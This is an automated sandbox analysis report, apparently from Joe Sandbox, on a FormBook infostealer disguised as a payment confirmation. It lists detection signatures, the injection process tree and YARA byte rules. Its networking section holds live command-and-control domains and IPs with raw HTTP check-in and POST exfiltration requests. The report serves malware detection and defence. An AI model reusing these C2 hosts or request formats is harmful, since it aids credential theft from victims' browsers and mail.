Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment confirmation 20240911.exe

Overview

General Information

Sample name:Payment confirmation 20240911.exe
Analysis ID:1509210
MD5:fce0847be56787ed350b9aa76990d91d
SHA1:5c3d8ca6e50e763b87244d7b9e84eab52ad6464f
SHA256:f5be3462bef54d4bd79a337ab058dd1663c0a3d23a27f1c7573dde13893c8db2
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • Payment confirmation 20240911.exe (PID: 3216 cmdline: "C:\Users\user\Desktop\Payment confirmation 20240911.exe" MD5: FCE0847BE56787ED350B9AA76990D91D)
    • svchost.exe (PID: 3264 cmdline: "C:\Users\user\Desktop\Payment confirmation 20240911.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
      • xONxwdydvq.exe (PID: 1544 cmdline: "C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 3292 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 08D323750350A8A29611D1004C0CF319)
          • firefox.exe (PID: 3464 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bdd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13fcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x42872:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x2aa71:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e773:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16972:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", CommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", CommandLine|base64offset|contains: r*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", ParentImage: C:\Users\user\Desktop\Payment confirmation 20240911.exe, ParentProcessId: 3216, ParentProcessName: Payment confirmation 20240911.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", ProcessId: 3264, ProcessName: svchost.exe
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\RMActivate_ssp.exe, ProcessId: 3292, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", CommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", CommandLine|base64offset|contains: r*', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", ParentImage: C:\Users\user\Desktop\Payment confirmation 20240911.exe, ParentProcessId: 3216, ParentProcessName: Payment confirmation 20240911.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment confirmation 20240911.exe", ProcessId: 3264, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-11T10:09:08.800408+020020507451Malware Command and Control Activity Detected192.168.2.224916147.57.185.22780TCP
            2024-09-11T10:09:27.129558+020020507451Malware Command and Control Activity Detected192.168.2.224916689.58.49.180TCP
            2024-09-11T10:09:58.325132+020020507451Malware Command and Control Activity Detected192.168.2.2249170154.23.184.24080TCP
            2024-09-11T10:10:11.711785+020020507451Malware Command and Control Activity Detected192.168.2.224917485.159.66.9380TCP
            2024-09-11T10:10:25.063039+020020507451Malware Command and Control Activity Detected192.168.2.2249178185.173.111.7680TCP
            2024-09-11T10:10:38.517261+020020507451Malware Command and Control Activity Detected192.168.2.2249182203.161.43.22880TCP
            2024-09-11T10:10:51.794228+020020507451Malware Command and Control Activity Detected192.168.2.2249186161.97.168.24580TCP
            2024-09-11T10:11:05.390377+020020507451Malware Command and Control Activity Detected192.168.2.2249190172.96.191.3980TCP
            2024-09-11T10:11:18.744513+020020507451Malware Command and Control Activity Detected192.168.2.2249194104.21.20.12580TCP
            2024-09-11T10:11:32.596650+020020507451Malware Command and Control Activity Detected192.168.2.224919843.242.202.16980TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Payment confirmation 20240911.exeReversingLabs: Detection: 31%
            Source: Payment confirmation 20240911.exeVirustotal: Detection: 33%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Payment confirmation 20240911.exeJoe Sandbox ML: detected
            Source: Payment confirmation 20240911.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xONxwdydvq.exe, 00000003.00000002.745699004.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.379153081.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.379175938.0000000000380000.00000004.00000020.00020000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000003.372791774.0000000000757000.00000004.00000001.00020000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000003.372875167.00000000003E0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Payment confirmation 20240911.exe, 00000000.00000003.350250762.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Payment confirmation 20240911.exe, 00000000.00000003.349937356.0000000003640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.386096763.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.368106439.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.368458108.0000000000720000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.386096763.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.387256900.0000000001C80000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745591734.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.387592222.0000000001DE0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745591734.0000000001F70000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: xONxwdydvq.exe, 00000003.00000002.746297118.000000000485C000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745454539.000000000061C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.745738795.000000000281C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.453233728.000000000106C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012FDD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_012FDD92
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0133219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0133219F
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01332044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_01332044
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_013324A9
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01326B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_01326B3F
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01326E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_01326E4A
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0132F350
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132FD47 FindFirstFileW,FindClose,0_2_0132FD47
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0132FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0132FDD2
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 4x nop then xor eax, eax3_2_004060CB
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 4x nop then mov esp, ebp3_2_00400561
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeCode function: 4x nop then pop edi3_2_004116EF

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49178 -> 185.173.111.76:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49161 -> 47.57.185.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49174 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49190 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49182 -> 203.161.43.228:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49194 -> 104.21.20.125:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49198 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49166 -> 89.58.49.1:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49170 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.22:49186 -> 161.97.168.245:80
            Performs DNS queries to domains with low reputation
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeDNS query: www.golbasi-nakliyat.xyz
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeDNS query: www.kckartal.xyz
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewIP Address: 85.159.66.93 85.159.66.93
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox ViewASN Name: CIZGITR CIZGITR
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0133550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_0133550C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3220000[1].zipJump to behavior
            Source: global trafficHTTP traffic detected: GET /w9nd/?OlTXe=9dRK0h7YIJsGSRnhz+5Tf8djouf69SHBPHBwJCn+XP7nQ6BgyCo2HiS/iTx4FkUQNu4yOr79gxANSvRKU1dByDA5Y/6ByTaTkhQGev+u0gipHNJhsTWzO6tEXOan&th=XXRlJ2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.726075.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2018/sqlite-dll-win32-x86-3220000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /xcfw/?th=XXRlJ2&OlTXe=bjW1F6zberoR1D3Y/SomYFBb4KPgrI5pHttayncOl0oweWLXznwXhPhkwae0bsL9Ak/eXSPCLR9UrmkbImBsoCTsC8RlRsuK5QCdMTge/fZa3QU+WBAP1g1G0kur HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.freepicture.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p39s/?th=XXRlJ2&OlTXe=1N9NMDNpm9Czos0vDrs0jP0yJ99w59mrSL4zw6nNIeZI+vV5F9OeHegmPR72METQIT3pI5KWWCEpjpCMjPRQtKE/9BfJGlSqJeHxtl2Ce1Gg34KYTx0FEqSEiFH5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.hm62t.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /k2vl/?OlTXe=TxupyKnRMohPPcJUOS0MXPimpk4F304dGmgAGE+PRAnDIVDTmPtylWW9xTGIc+3DzvKXbunYVpmmYdbvcJ53VYYaSs8c8gEur6KMZZBX2lUDNg59LBcCd3WrENlZ&th=XXRlJ2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.golbasi-nakliyat.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mfgamecompany.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ftr3/?OlTXe=7ghTfXuNFdv7bt0cffwS+GQv8BggimAttJoldp68xQSgk3fAwjETfWJmY0r3VEazrWArn7FbDu6sdwx26ciS++knKqqM0OcB3qa3ON8TTY6A6Cdgot3Jd9OI6yIP&th=XXRlJ2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.quilo.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wjff/?th=XXRlJ2&OlTXe=4KVKOjLTUXvpTd2tw+0OX+rMvdItGaiAiZnao6g9chZjOHWeMu7zgCrtm+9lJj39MntFpwW3ylu2DkTtyMRuAfMcELFFIudA3Xek0R/SN0pIlMTDq5r7ULEj7ewp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.qiluqiyuan.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lkx/?OlTXe=RihUS+ZcBcWtP49cUvm0lvpx13KYYtk0xYk2jkkE+x6ehgmefEg3A03kFcwA9a4nHW6JAbXkRdpGmWZgq18CGWb25/mMW/yooXsz9tlrWzKj4hGr16wEjBRj2jd5&th=XXRlJ2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.bola88site.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /h5qr/?th=XXRlJ2&OlTXe=/bmdZ0vLXnogocV0idkPv6fvlXir++PhB87loKV3gq9LyeQpMfhy5LnTQyXzEM68COgVHo1sr0sPxg1PcZaDoopDxaOUW7iZ7CHsWJT1TI0rPygwHovQ2DwKWcHt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kckartal.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ed2j/?OlTXe=HnYP2yoU4dt40olvIGC5RoskYevTXTgkbcmGMLslyKV8dFp2SGuaPRuUt3ufihjdd5fzvgaawU7CuzqToCbPCdeTlZwsuBv/uVCwYl9sd7doy+RVtoqpun8fEj8V&th=XXRlJ2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mizuquan.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.726075.buzz
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.freepicture.online
            Source: global trafficDNS traffic detected: DNS query: www.318st.com
            Source: global trafficDNS traffic detected: DNS query: www.hm62t.top
            Source: global trafficDNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mfgamecompany.shop
            Source: global trafficDNS traffic detected: DNS query: www.quilo.life
            Source: global trafficDNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.kckartal.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mizuquan.top
            Source: global trafficDNS traffic detected: DNS query: www.kxshopmr.store
            Source: unknownHTTP traffic detected: POST /xcfw/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enHost: www.freepicture.onlineOrigin: http://www.freepicture.onlineReferer: http://www.freepicture.online/xcfw/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 2162Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 4f 6c 54 58 65 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 44 69 70 78 6d 6f 37 4f 46 64 39 70 71 6d 31 34 35 56 72 4d 72 41 30 79 53 64 30 33 48 63 2f 48 6d 58 4d 32 31 51 44 31 34 63 54 34 4b 6d 30 5a 4c 2f 4a 47 58 4c 74 49 53 32 79 4b 44 39 39 74 44 6f 36 56 30 5a 70 68 69 2f 46 44 64 35 53 66 74 47 49 6d 69 53 57 46 42 46 68 33 59 70 46 77 52 59 34 54 30 4d 57 35 51 78 43 36 68 48 4f 54 31 57 4b 31 4a 6f 46 58 62 4e 34 